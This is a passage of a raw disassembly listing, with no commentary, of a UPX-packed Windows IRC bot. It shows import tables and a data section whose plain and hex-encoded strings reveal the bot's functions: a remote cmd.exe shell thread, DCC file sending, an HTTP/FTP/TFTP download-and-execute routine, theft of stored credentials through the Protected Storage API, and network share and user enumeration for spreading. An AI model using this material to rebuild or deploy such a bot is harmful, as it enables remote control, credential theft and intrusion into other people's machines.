loc_416FDD: ; DATA XREF: sub_414EF4�o
mov eax, offset dword_417350
jmp loc_416E08
; ---------------------------------------------------------------------------
align 20h
UPX0 ends
; Section 2. (virtual address 00017000)
; Virtual size : 0000B000 ( 45056.)
; Section size in file : 0000B000 ( 45056.)
; Offset to raw data for section: 00017000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 417000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_417000 dd 77DD7F3Eh ; DATA XREF: sub_401000+C6�r
; UPX1:00421AA1�o
dword_417004 dd 77DD5C55h ; DATA XREF: sub_401000+11A�r
; sub_406C51+96�r
dword_417008 dd 77DD22EAh ; DATA XREF: sub_401000+65�r
; sub_406722+184�r ...
dword_41700C dd 77DD23D7h ; DATA XREF: sub_406722+1C3�r
; sub_4083AD+2DD�r ...
dword_417010 dd 77DD59F0h ; DATA XREF: sub_406C51+88�r
dword_417014 dd 77DD590Bh ; DATA XREF: sub_406C51+26�r
dword_417018 dd 77DDACABh ; DATA XREF: sub_4083AD+E6�r
dword_41701C dd 77DE042Eh ; DATA XREF: sub_4102AE+62�r
dword_417020 dd 77DE03D2h ; DATA XREF: sub_4102AE+27�r
; sub_4102AE+37�r ...
dword_417024 dd 77DDEBA2h ; DATA XREF: sub_4102AE+17�r
dword_417028 dd 77DD189Ah ; DATA XREF: sub_401000+136�r
; sub_406722+2F9�r ...
align 10h
dword_417030 dd 77E7C657h ; DATA XREF: sub_4083AD+11E�r
; sub_40D043+20B�r ...
dword_417034 dd 77E7513Ch ; DATA XREF: sub_408342+10�r
; sub_408342+4B�r
dword_417038 dd 77E705C5h ; DATA XREF: sub_406D47+41�r
dword_41703C dd 77E74672h ; DATA XREF: sub_406C51+6F�r
; sub_414EF4+8EE�r
dword_417040 dd 77E705B0h ; DATA XREF: sub_406B81+15�r
dword_417044 dd 77E7A837h ; DATA XREF: sub_406B81+47�r
; sub_406B81+95�r ...
dword_417048 dd 77E73CE2h ; DATA XREF: sub_406B81+6E�r
dword_41704C dd 77E7011Ah ; DATA XREF: sub_406B81+BC�r
dword_417050 dd 77E704FCh ; DATA XREF: sub_406A23+15�r
; sub_406AE7+15�r ...
dword_417054 dd 77E805D8h ; DATA XREF: sub_403BD3+B�r
; sub_403BD3+32�r ...
dword_417058 dd 77E7A5FDh ; DATA XREF: sub_403BD3+22�r
; sub_403BD3+4D�r ...
dword_41705C dd 77E75CB5h ; DATA XREF: sub_40332B+227�r
; sub_407148+18B�r ...
dword_417060 dd 77E6BD13h ; DATA XREF: sub_402A32+EC�r
; sub_406E8E+1FE�r
dword_417064 dd 77F5157Dh ; DATA XREF: sub_402A32+F6�r
; sub_409CB1+CF�r ...
dword_417068 dd 77E79D8Ch ; DATA XREF: sub_401D39+22�r
; sub_406D90+D3�r
dword_41706C dd 77E6CBF9h ; DATA XREF: sub_401981+4F�r
dword_417070 dd 77E7727Ah ; DATA XREF: sub_401981+9E�r
; sub_401981+D7�r
dword_417074 dd 77E79C90h ; DATA XREF: sub_401981+104�r
; sub_401981+111�r
dword_417078 dd 77E65F4Ch ; DATA XREF: sub_4083AD+FA�r
dword_41707C dd 77E61BB8h ; DATA XREF: sub_401981+1C6�r
; sub_406E8E+2A5�r
dword_417080 dd 77EB7624h ; DATA XREF: sub_401981+274�r
dword_417084 dd 77E7FF65h ; DATA XREF: sub_401981+2B3�r
dword_417088 dd 77E78B82h ; DATA XREF: sub_401981+37B�r
dword_41708C dd 77E79F93h ; DATA XREF: sub_401244+F2�r
; sub_40332B+1D0�r ...
dword_417090 dd 77E7A099h ; DATA XREF: sub_401244+F9�r
; sub_40332B+1D7�r ...
dword_417094 dd 77E706B7h ; DATA XREF: sub_401244+159�r
; sub_406041+193�r ...
dword_417098 dd 77E61A54h ; DATA XREF: sub_401244+21D�r
; sub_406509+91�r
dword_41709C dd 77E61BE6h ; DATA XREF: sub_401244+3C6�r
; sub_401244+4F4�r ...
dword_4170A0 dd 77E616B4h ; DATA XREF: sub_401244+439�r
; sub_406643+3B�r
dword_4170A4 dd 77E77963h ; DATA XREF: sub_401244+471�r
; sub_401244+4C1�r ...
dword_4170A8 dd 77E70396h ; DATA XREF: sub_401146+11�r
; sub_406E8E+22A�r ...
dword_4170AC dd 77E73628h ; DATA XREF: sub_401146+23�r
; sub_401E38+30�r ...
dword_4170B0 dd 77E79A45h ; DATA XREF: sub_416F4E+1E�r
dword_4170B4 dd 77E7AC37h ; DATA XREF: sub_40A1A7+106�r
dword_4170B8 dd 77E75090h ; DATA XREF: sub_40D74D+87�r
dword_4170BC dd 77E74D76h ; DATA XREF: sub_40D74D+4A�r
dword_4170C0 dd 77E77797h ; DATA XREF: sub_40D74D+33�r
dword_4170C4 dd 77E76C1Ah ; DATA XREF: sub_4083AD+33�r
dword_4170C8 dd 77E686CCh ; DATA XREF: sub_408E8E+4B�r
; sub_408F2E+134�r
dword_4170CC dd 77E6C0E3h ; DATA XREF: sub_408E8E+1A�r
; sub_408F2E+7F�r ...
dword_4170D0 dd 77E7751Ah ; DATA XREF: sub_409226:loc_40928E�r
; sub_4092A4:loc_409307�r ...
dword_4170D4 dd 77E6D75Bh ; DATA XREF: sub_409226+14�r
; sub_4092A4+14�r ...
dword_4170D8 dd 77E802FCh ; DATA XREF: sub_409226+A�r
; sub_4092A4+A�r ...
dword_4170DC dd 77E7176Ch ; DATA XREF: sub_4093B6+51�r
dword_4170E0 dd 77E75CEBh ; DATA XREF: sub_4098F3+A2�r
; sub_4098F3+1B6�r
dword_4170E4 dd 77E79908h ; DATA XREF: sub_409C36+2E�r
dword_4170E8 dd 77E80656h ; DATA XREF: sub_401244+D7�r
; sub_406643+19�r
dword_4170EC dd 77F7E21Fh ; DATA XREF: sub_409C6C+6�r
dword_4170F0 dd 77E79CE3h ; DATA XREF: sub_401981+118�r
dword_4170F4 dd 77E78C17h ; DATA XREF: UPX0:00416822�r
dword_4170F8 dd 77E7C2C4h ; DATA XREF: UPX0:00416899�r
dword_4170FC dd 77E73167h ; DATA XREF: sub_414EF4+5AA�r
; sub_414EF4+5BC�r ...
dword_417100 dd 77E73BEFh ; DATA XREF: sub_414EF4+9C0�r
dword_417104 dd 77E7AC5Eh ; DATA XREF: sub_4148CE+B0�r
dword_417108 dd 77E76432h ; DATA XREF: sub_40D871+29B�r
; sub_414EF4+5CE�r ...
dword_41710C dd 77F7E300h ; DATA XREF: sub_409C7A+6�r
dd 0
dword_417114 dd 77C1C055h ; DATA XREF: sub_416F7A�r
dword_417118 dd 77C423F5h ; DATA XREF: sub_416F80�r
dword_41711C dd 77C219F5h ; DATA XREF: sub_416FA2�r
dword_417120 dd 77C20C5Bh ; DATA XREF: sub_416FA8�r
dword_417124 dd 77C21AD8h ; DATA XREF: UPX0:loc_416E08�r
dword_417128 dd 77C43150h ; DATA XREF: sub_416E02�r
dword_41712C dd 77C41FA0h ; DATA XREF: sub_416B3A�r
dword_417130 dd 77C33FDEh ; DATA XREF: sub_416DFC�r
dword_417134 dd 77C33FC1h ; DATA XREF: sub_416DF6�r
dword_417138 dd 77C3CE0Ch ; DATA XREF: sub_416DF0�r
dword_41713C dd 77C42D60h ; DATA XREF: sub_416DEA�r
dword_417140 dd 77C1C6F3h ; DATA XREF: sub_416DE4�r
dword_417144 dd 77C435C0h ; DATA XREF: sub_416DDE�r
dword_417148 dd 77C3E5D9h ; DATA XREF: sub_416DD8�r
dword_41714C dd 77C28925h ; DATA XREF: sub_416DD2�r
dword_417150 dd 77C28933h ; DATA XREF: sub_416DCC�r
dword_417154 dd 77C3CCE7h ; DATA XREF: sub_416DC6�r
dword_417158 dd 77C37FEDh ; DATA XREF: sub_416DC0�r
dword_41715C dd 77C33EB0h ; DATA XREF: sub_416DBA�r
dword_417160 dd 77C4B940h ; DATA XREF: sub_416CFE�r
dword_417164 dd 77C4B120h ; DATA XREF: sub_416CF8�r
dword_417168 dd 77C37ADCh ; DATA XREF: sub_416BFC�r
dword_41716C dd 77C2AC58h ; DATA XREF: sub_416BF6�r
dword_417170 dd 77C438C0h ; DATA XREF: sub_416BF0�r
dword_417174 dd 77C3C93Ch ; DATA XREF: sub_416BAE�r
dword_417178 dd 77C43AB0h ; DATA XREF: sub_416BA8�r
dword_41717C dd 77C3E8C0h ; DATA XREF: sub_416BA2�r
dword_417180 dd 77C1BE00h ; DATA XREF: sub_416B9C�r
dword_417184 dd 77C3E140h ; DATA XREF: sub_416B96�r
dword_417188 dd 77C3DFB5h ; DATA XREF: sub_416B90�r
dword_41718C dd 77C3BF06h ; DATA XREF: sub_416B88�r
dword_417190 dd 77C3D8F6h ; DATA XREF: sub_416B82�r
dword_417194 dd 77C3E4B9h ; DATA XREF: sub_416B7C�r
dword_417198 dd 77C3E303h ; DATA XREF: sub_416B76�r
dword_41719C dd 77C41FB0h ; DATA XREF: sub_416B70�r
dword_4171A0 dd 77C43490h ; DATA XREF: sub_416B6A�r
dword_4171A4 dd 77C46553h ; DATA XREF: sub_416B64�r
dword_4171A8 dd 77C3C813h ; DATA XREF: sub_416B5E�r
dword_4171AC dd 77C43900h ; DATA XREF: sub_416B58�r
dword_4171B0 dd 77C42E10h ; DATA XREF: sub_416B52�r
dword_4171B4 dd 77C2AA6Bh ; DATA XREF: sub_416B4C�r
dword_4171B8 dd 77C2AC46h ; DATA XREF: sub_416B46�r
dword_4171BC dd 77C43710h ; DATA XREF: sub_416B40�r
dword_4171C0 dd 77C421A2h ; DATA XREF: sub_416F74�r
align 8
dword_4171C8 dd 7713BC68h ; DATA XREF: sub_416E4E+44�r
align 10h
dword_4171D0 dd 77428B97h ; DATA XREF: sub_401D6E+2D�r
; sub_402A32+79B�r ...
align 8
dword_4171D8 dd 77D4456Bh ; DATA XREF: sub_40A9CF+121�r
dword_4171DC dd 77D79D1Ch ; DATA XREF: sub_414EF4+76D�r
dword_4171E0 dd 77D4C96Ah ; DATA XREF: sub_406D90+B0�r
; sub_408F2E+1D1�r ...
dword_4171E4 dd 77D5C13Ah ; DATA XREF: sub_40A9CF+128�r
; sub_415B60+84�r
dword_4171E8 dd 77D4BDCAh ; DATA XREF: sub_40D734+B�r
dword_4171EC dd 77D4702Fh ; DATA XREF: sub_40D74D+6C�r
; sub_40D74D+7E�r
dd 0
dword_4171F4 dd 71AB3E5Dh ; DATA XREF: sub_404FE7+C5�r
; sub_4050EA+106�r ...
dword_4171F8 dd 71AB1B7Bh ; DATA XREF: sub_416E30�r
dword_4171FC dd 71AB868Dh ; DATA XREF: sub_4048EF+11E�r
; sub_4048EF+39F�r
dword_417200 dd 71AB8629h ; DATA XREF: sub_40538D+8�r
; sub_412A3A+178�r ...
dword_417204 dd 71AB3F8Dh ; DATA XREF: sub_4046BC+114�r
; sub_4055E5+7B�r ...
dword_417208 dd 71AB3ECEh ; DATA XREF: sub_4046BC+129�r
; sub_411DC5+DF�r ...
dword_41720C dd 71AB1AF4h ; DATA XREF: sub_4053BF+F�r
; sub_40A9CF+1A74�r
dword_417210 dd 71ABF628h ; DATA XREF: sub_4044F7+21�r
; sub_4045B2+21�r
dword_417214 dd 71AB155Ah ; DATA XREF: sub_404457+1C�r
; sub_40447B+10�r
dword_417218 dd 71AB3C22h ; DATA XREF: sub_40432E+A�r
; sub_4046BC+CE�r ...
dword_41721C dd 71AB401Ch ; DATA XREF: sub_4038BA+72�r
; sub_40732D+1A8�r ...
dword_417220 dd 71ABD755h ; DATA XREF: sub_4038BA+D0�r
; sub_4038BA+171�r ...
dword_417224 dd 71AB1740h ; DATA XREF: sub_4038BA+E5�r
; sub_4038BA+186�r ...
dword_417228 dd 71ABD850h ; DATA XREF: sub_4038BA+28D�r
dword_41722C dd 71AB1890h ; DATA XREF: sub_4048EF+265�r
; sub_404E1C+E0�r ...
dword_417230 dd 71AB1A6Dh ; DATA XREF: sub_4053B1+6�r
; sub_40A9CF+1A80�r ...
dword_417234 dd 71AB350Dh ; DATA XREF: sub_403588+23�r
; sub_403588+4A�r ...
dword_417238 dd 71AB1746h ; DATA XREF: sub_403588+BA�r
; sub_403588+1FE�r ...
dword_41723C dd 71AB2BBFh ; DATA XREF: sub_403588+151�r
; sub_4055E5+F3�r ...
dword_417240 dd 71AB157Eh ; DATA XREF: sub_4020C2+B9�r
; sub_40449C+21�r ...
dword_417244 dd 71AB12F8h ; DATA XREF: sub_4020C2+1FA�r
; sub_4055E5+DD�r ...
dword_417248 dd 71AB5690h ; DATA XREF: sub_401E38+106�r
; sub_4053DC+27�r ...
dword_41724C dd 71AB12A7h ; DATA XREF: sub_401E38+141�r
; sub_4020C2+201�r
dword_417250 dd 71AB1ED3h ; DATA XREF: sub_4055E5+7F2�r
; sub_411DC5+372�r ...
dword_417254 dd 71AB1836h ; DATA XREF: sub_406E8E+2AB�r
; sub_407148+183�r ...
dword_417258 dd 71AB1444h ; DATA XREF: sub_411DC5+2A1�r
dword_41725C dd 71AB14DCh ; DATA XREF: sub_415F69+157�r
dword_417260 dd 71AB32CAh ; DATA XREF: sub_415F69+81�r
dword_417264 dd 71AB41DAh ; DATA XREF: UPX0:004169F2�r
dword_417268 dd 71AB5DE2h ; DATA XREF: sub_4046BC+14D�r
align 10h
flt_417270 dd 1.0e3 ; DATA XREF: sub_401E38+207�r
; sub_401E38+22F�r ...
flt_417274 dd 1.024e3 ; DATA XREF: sub_408B30+2A2�r
dword_417278 dd 0FFFFFFFFh, 409449h, 40945Fh, 0 ; DATA XREF: sub_4093B6+5�o
dword_417288 dd 0FFFFFFFFh, 409572h, 40958Ah, 0 ; DATA XREF: sub_4094E6+5�o
dword_417298 dd 0FFFFFFFFh, 416AE7h, 416AFDh, 0 ; DATA XREF: UPX0:004167F6�o
dd offset loc_416AC5
dd offset loc_416ADB
dd offset dword_4172F0
off_4172B4 dd offset sub_416F05 ; DATA XREF: sub_416ED3+12�o
; UPX0:00416F3A�o ...
dd offset dword_417338
off_4172BC dd offset sub_416F86 ; DATA XREF: UPX1:off_41DEB0�o
; UPX1:off_41DED0�o
off_4172C0 dd offset off_41DEB0 ; DATA XREF: UPX1:004172D8�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_4172C0
dword_4172DC dd 3 dup(0) ; DATA XREF: UPX1:00417300�o
dd 1, 4172D8h
dword_4172F0 dd 3 dup(0) ; DATA XREF: UPX1:004172B0�o
dd offset off_41DEB0
dd offset dword_4172DC+4
align 8
off_417308 dd offset off_41DED0 ; DATA XREF: UPX1:00417320�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_417308
dd 0
db 0 ; DATA XREF: UPX1:00417348�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 1, 417320h
dword_417338 dd 3 dup(0) ; DATA XREF: UPX1:004172B8�o
dd offset off_41DED0
dd offset unk_417328
align 10h
dword_417350 dd 19930520h, 4, 417370h, 5 dup(0) ; DATA XREF: UPX0:loc_416FDD�o
dd 0FFFFFFFFh, 416FB0h, 0
dd offset loc_416FBC
dd 1, 416FC5h, 2, 416FD1h, 0
dd offset off_41DEB0
dd 0
dd 0FFFFFFFFh, 0
dd 10h, 416F21h, 0
dword_4173B0 dd 1, 417390h ; DATA XREF: UPX1:004173C4�o
dword_4173B8 dd 0 ; DATA XREF: sub_416EAF+19�o
dd offset sub_416F4E
dd 0
dd offset dword_4173B0
dd 30Eh dup(0)
off_418000 dd offset dword_418098 ; DATA XREF: sub_401000+1D�r
; sub_401000+2E�r
dd offset dword_41805C
dd offset aKnJnuXxQEzds ; "ª¿œ¿µ¦ž»ß•å¸šÉŸ¶…§„‘"
dd offset dword_418014
dd 0
dword_418014 dd 0BC8A9BAAh, 8B88998Dh, 93C484B7h, 0C9AAA3F9h, 87ABB697h
; DATA XREF: UPX1:0041800C�o
dd 0BCB187A4h, 98D9B59Eh, 0CA86A5E3h, 89AA8EA5h, 2 dup(0)
aKnJnuXxQEzds db 'ª¿œ¿µ¦ž»ß•å¸šÉŸ¶…§„‘',0 ; DATA XREF: UPX1:00418008�o
align 4
dd 0
dword_41805C dd 9CBFADAAh, 0ADA6B5BFh, 95DFBB9Eh, 0C99AB8E5h, 0BF85B69Fh
; DATA XREF: UPX1:00418004�o
dd 0A7B0BAA1h, 0B5EA85B5h, 0C39BA5E2h, 8D8FB697h, 0A7BDA7BAh
dd 83E4AAACh, 0D48C84F9h, 8DBAAB8Fh, 0BBh, 0
dword_418098 dd 9CBFADAAh, 0ADA6B5BFh, 95DFBB9Eh, 0C99AB8E5h, 0BF85B69Fh
; DATA XREF: UPX1:off_418000�o
dd 0A7B0BAA1h, 0B5EA85B5h, 0C39BA5E2h, 8D8FB697h, 0A7BDA7BAh
dd 83E4AAACh, 0F9h, 0
dword_4180CC dd 2343003h, 2037525h, 746F6220h, 20297328h, 6E756F66h
; DATA XREF: sub_401244+52D�o
dd 69772064h, 73206874h, 6E697274h, 30032067h, 73250234h
dd 2E0203h
dword_4180F8 dd 62206F4Eh, 2073746Fh, 6E756F66h, 69772064h, 73206874h
; DATA XREF: sub_401244+50A�o
dd 6E697274h, 30032067h, 73250234h, 2E0203h
dword_41811C dd 6E756F66h, 74732064h, 676E6972h, 34300320h, 3732502h
; DATA XREF: sub_401244+412�o
dd 6E692002h, 20732520h, 34300328h, 3692502h, 2902h
dword_418144 dd 3430032Dh, 3752502h, 4C202D02h, 69747369h, 6220676Eh
; DATA XREF: sub_401244+45�o
dd 2073746Fh, 68746977h, 72747320h, 20676E69h, 2343003h
dd 2037325h, 3Ah
dword_418174 dd 62207325h, 2073746Fh, 68746977h, 72747320h, 20676E69h
; DATA XREF: sub_4017AA+93�o
dd 2343003h, 2037325h, 0
aKilling db 'Killing',0 ; DATA XREF: sub_4017AA:loc_401830�o
aListing db 'Listing',0 ; DATA XREF: sub_4017AA+7D�o
dword_4181A4 dd 303h ; DATA XREF: sub_4018AF:loc_401942�o
aCmd_exeProcess db 'Cmd.exe process has terminated.',0 ; DATA XREF: sub_401981+2C9�o
aCouldNotReadDa db 'Could not read data from process.',0 ; DATA XREF: sub_401981+27E�o
align 4
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_401981+48�o
aErrorWhileExec db 'Error while executing command.',0 ; DATA XREF: sub_401D6E+B9�o
align 4
asc_418214 db 0Dh,0Ah,0 ; DATA XREF: sub_401D6E:loc_401E0B�o
; sub_403DF3+18C�o ...
align 4
aRemoteCmdThrea db 'Remote cmd thread',0 ; DATA XREF: sub_401D6E+7E�o
align 4
aOpen db 'open',0 ; DATA XREF: sub_401D6E+26�o
; sub_402A32+794�o ...
align 4
dword_418234 dd 65636552h, 64657669h, 34300320h, 3732502h, 72662002h
; DATA XREF: sub_401E38+248�o
dd 3206D6Fh, 25023430h, 20020373h, 3206E69h, 25023430h
dd 66322E30h, 65730203h, 69772063h, 3206874h, 25023430h
dd 66332E30h, 424B0203h, 6365732Fh, 0
dword_418280 dd 3430032Dh, 3752502h, 52202D02h, 69656365h, 676E6976h
; DATA XREF: sub_401E38+CC�o
dd 34300320h, 3732502h, 72662002h, 3206D6Fh, 25023430h
dd 20373h
dword_4182AC dd 6277h ; DATA XREF: sub_401E38+36�o
; sub_402698:loc_40288E�o ...
dword_4182B0 dd 746E6553h, 34300320h, 3732502h, 6F742002h, 34300320h
; DATA XREF: sub_4020C2+3E1�o
dd 3732502h, 6E692002h, 34300320h, 2E302502h, 2036632h
dd 20636573h, 68746977h, 34300320h, 2E302502h, 2036633h
dd 732F424Bh, 6365h
dword_4182F4 dd 6E617254h, 72656673h, 20666F20h, 2343003h, 2037325h
; DATA XREF: sub_4020C2+313�o
dd 206F7420h, 2343003h, 2037325h, 6E616320h, 6C6C6563h
dd 6465h
dword_418320 dd 3430032Dh, 3752502h, 53202D02h, 69646E65h, 320676Eh
; DATA XREF: sub_4020C2+28E�o
dd 25023430h, 20020373h, 3206F74h, 25023430h, 20373h
dword_418348 dd 43434401h, 4E455320h, 25222044h, 25202273h, 73252064h
; DATA XREF: sub_4020C2+20F�o
dd 1642520h, 0
aDccSendSS db 'DCC Send %s (%s)',0 ; DATA XREF: sub_4020C2+1D2�o
align 4
aRb db 'rb',0 ; DATA XREF: sub_4020C2:loc_40220F�o
; sub_406AE7+63�o ...
align 4
dword_41837C dd 65636552h, 6E697669h, 30032067h, 73250234h, 66200203h
; DATA XREF: sub_4024F3+101�o
dd 206D6F72h, 2343003h, 2037325h, 0
dword_4183A0 dd 646E6553h, 20676E69h, 2343003h, 2037325h, 206F7420h
; DATA XREF: sub_40260D+72�o
dd 2343003h, 2037325h, 0
aContentLengthU db 'Content-Length: %u',0Dh,0Ah,0 ; DATA XREF: sub_402698+155�o
align 4
aContentLength db 'Content-Length: ',0 ; DATA XREF: sub_402698+104�o
align 4
asc_4183EC db 0Dh,0Ah ; DATA XREF: sub_402698:loc_402758�o
db 0Dh,0Ah,0
align 4
aGetSHttp1_0Hos db 'GET /%s HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_402698+3A�o
; sub_4088FC+E9�o
db 'Host: %s',0Dh,0Ah
db 0Dh,0Ah,0
align 4
dword_418414 dd 3430032Dh, 3752502h, 45202D02h, 726F7272h, 69687720h
; DATA XREF: sub_402A32+7F6�o
dd 6420656Ch, 6C6E776Fh, 6964616Fh, 320676Eh, 25023430h
dd 2E020373h, 0
dword_418444 dd 3430032Dh, 3752502h, 55202D02h, 6C62616Eh, 6F742065h
; DATA XREF: sub_402A32+7D1�o
dd 61747320h, 3207472h, 25023430h, 2E020373h, 0
dword_41846C dd 3430032Dh, 3752502h, 53202D02h, 65636375h, 75667373h
; DATA XREF: sub_402A32+738�o
dd 20796C6Ch, 6E776F64h, 64616F6Ch, 3206465h, 25023430h
dd 20020373h, 68746977h, 34300320h, 2E302502h, 2036632h
dd 732F424Bh, 73256365h, 2Eh
dword_4184B4 dd 7865202Ch, 74756365h, 676E69h ; DATA XREF: sub_402A32+6B0�o
dword_4184C0 dd 7075202Ch, 69746164h, 676Eh ; DATA XREF: sub_402A32+699�o
unk_4184CC db 2Dh ; - ; DATA XREF: sub_402A32+50E�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aNoFileToDownlo db '- No file to download specified.',0
align 4
asc_4184F8: ; DATA XREF: sub_402A32:loc_402F16�o
unicode 0, </>,0
asc_4184FC: ; DATA XREF: sub_402A32+45F�o
; sub_414EF4+644�o ...
unicode 0, <:>,0
unk_418500 db 2Dh ; - ; DATA XREF: sub_402A32+3E4�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aUnsupportedPro db '- Unsupported protocol specified.',0
align 4
a69 db '69',0 ; DATA XREF: sub_402A32+3A8�o
align 10h
aTftp db 'tftp://',0 ; DATA XREF: sub_402A32+387�o
aAnonymous db 'anonymous',0 ; DATA XREF: sub_402A32+35A�o
; sub_402A32+36D�o
align 4
a21 db '21',0 ; DATA XREF: sub_402A32+328�o
align 4
aFtp db 'ftp://',0 ; DATA XREF: sub_402A32+307�o
align 10h
a80 db '80',0 ; DATA XREF: sub_402A32+2CE�o
; sub_4043E9+27�o ...
align 4
aHttp db 'http://',0 ; DATA XREF: sub_402A32+2AD�o
dword_41855C dd 3430032Dh, 3752502h, 43202D02h, 6F6E6E61h, 65722074h
; DATA XREF: sub_402A32+135�o
dd 73206461h, 6372756Fh, 69662065h, 320656Ch, 25023430h
dd 2E020373h, 0
dword_41858C dd 3430032Dh, 3752502h, 43202D02h, 6F6E6E61h, 72772074h
; DATA XREF: sub_402A32+110�o
dd 20657469h, 64206F74h, 69747365h, 6974616Eh, 66206E6Fh
dd 20656C69h, 2343003h, 2037325h, 2Eh
dword_4185C4 dd 656C6966h, 2F2F3Ah ; DATA XREF: sub_402A32+C0�o
dword_4185CC dd 3430032Dh, 3752502h, 44202D02h, 6C6E776Fh, 6964616Fh
; DATA XREF: sub_402A32+AA�o
dd 320676Eh, 25023430h, 20020373h, 3206F74h, 25023430h
dd 2E020373h, 0
dword_4185FC dd 6E776F44h, 64616F6Ch, 20676E69h, 2343003h, 2037325h
; DATA XREF: sub_403260+B2�o
dd 206F7420h, 2343003h, 2037325h, 0
dword_418620 dd 6578652Eh, 0 ; DATA XREF: sub_403260+43�o
; sub_412720+51�o
aQuitRestarting db 'QUIT :restarting',0 ; DATA XREF: sub_40332B:loc_403538�o
; sub_40332B:loc_403545�o ...
align 4
aQuitExitting db 'QUIT :exitting',0 ; DATA XREF: sub_40332B+200�o
; sub_40A9CF:loc_40BD52�o
align 4
dword_41864C dd 3430032Dh, 62656402h, 2036775h ; DATA XREF: sub_40332B+19C�o
aModuleSReporte db '- Module "%s" reported a crash in "%s": N=%u EAX=%08X EBX=%08X EC'
db 'X=%08X EDX=%08X ESI=%08X EDI=%08X EBP=%08X ESP=%08X EIP=%08X EFLA'
db 'GS=%08X. Code: %08X (%s). %s...',0
align 4
aContinuing db 'Continuing',0 ; DATA XREF: sub_40332B:loc_40342A�o
align 4
aRestarting db 'Restarting',0 ; DATA XREF: sub_40332B+F3�o
align 4
aException_flt db 'EXCEPTION_FLT',0 ; DATA XREF: sub_40332B:loc_40340C�o
align 4
aException_stac db 'EXCEPTION_STACK_OVERFLOW',0 ; DATA XREF: sub_40332B:loc_403403�o
align 10h
aException_nonc db 'EXCEPTION_NONCONTINUABLE_EXCEPTION',0
; DATA XREF: sub_40332B:loc_4033FA�o
align 4
aException_int_ db 'EXCEPTION_INT_DIVIDE_BY_ZERO',0 ; DATA XREF: sub_40332B:loc_4033F1�o
align 4
aException_ille db 'EXCEPTION_ILLEGAL_INSTRUCTION',0 ; DATA XREF: sub_40332B:loc_4033E8�o
align 4
aException_brea db 'EXCEPTION_BREAKPOINT',0 ; DATA XREF: sub_40332B:loc_4033DF�o
align 4
aException_acce db 'EXCEPTION_ACCESS_VIOLATION',0 ; DATA XREF: sub_40332B:loc_4033D6�o
align 4
aException_othe db 'EXCEPTION_OTHER',0 ; DATA XREF: sub_40332B+27�o
aUdp db 'udp',0 ; DATA XREF: sub_4038BA+27C�o
aInternetgetcon db 'InternetGetConnectedStateExA',0 ; DATA XREF: sub_403BD3+20B�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_403BD3:loc_403DCA�o
aPstorecreatein db 'PStoreCreateInstance',0 ; DATA XREF: sub_403BD3+1E4�o
align 10h
aPstorec_dll db 'pstorec.dll',0 ; DATA XREF: sub_403BD3:loc_403DA3�o
aFreeaddrinfo db 'freeaddrinfo',0 ; DATA XREF: sub_403BD3+184�o
align 4
aGetnameinfo db 'getnameinfo',0 ; DATA XREF: sub_403BD3+171�o
aGetaddrinfo db 'getaddrinfo',0 ; DATA XREF: sub_403BD3+15E�o
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_403BD3:loc_403D23�o
align 10h
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_403BD3+13D�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_403BD3+12A�o
align 10h
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_403BD3+117�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_403BD3+104�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_403BD3:loc_403CC3�o
aNetaddalternat db 'NetAddAlternateComputerName',0 ; DATA XREF: sub_403BD3+DD�o
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_403BD3+CA�o
align 10h
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_403BD3+B7�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_403BD3+A4�o
align 4
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_403BD3+91�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_403BD3+7E�o
aNetusedel db 'NetUseDel',0 ; DATA XREF: sub_403BD3+6B�o
align 4
aNetuseadd db 'NetUseAdd',0 ; DATA XREF: sub_403BD3+58�o
align 4
aNetusegetinfo db 'NetUseGetInfo',0 ; DATA XREF: sub_403BD3+45�o
align 4
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_403BD3:loc_403C00�o
align 4
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_403BD3+1A�o
align 10h
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_403BD3+6�o
align 10h
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_403DF3:loc_403F57�o
dword_4189C4 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 6920676Eh
; DATA XREF: sub_403DF3+6E�o
dd 746E6564h, 65732064h, 72657672h, 206E6F20h, 74726F70h
dd 34300320h, 3732502h, 2
dword_4189F8 dd 6E656449h, 73206474h, 65767265h, 6E6F2072h, 726F7020h
; DATA XREF: sub_403FE5+7E�o
dd 30032074h, 73250234h, 203h
dword_418A18 dd 333131h ; DATA XREF: sub_403FE5:loc_403FFD�o
dword_418A1C dd 0C6AEB58Eh, 0A6BBB6FEh, 93D8D8A7h, 0E3h, 0 ; DATA XREF: sub_4043E9+6�o
dword_418A30 dd 2E3031h ; DATA XREF: sub_4041B7+56�o
dword_418A34 dd 2E323931h, 2E383631h, 0 ; DATA XREF: sub_4041B7+3B�o
dword_418A40 dd 2E323731h, 0 ; DATA XREF: sub_4041B7+20�o
dword_418A48 dd 2E373231h, 0 ; DATA XREF: sub_4041B7+5�o
dword_418A50 dd 252E7525h, 75252E75h, 75252Eh ; DATA XREF: sub_40D871+1CC�o
; sub_41113B+45A�o
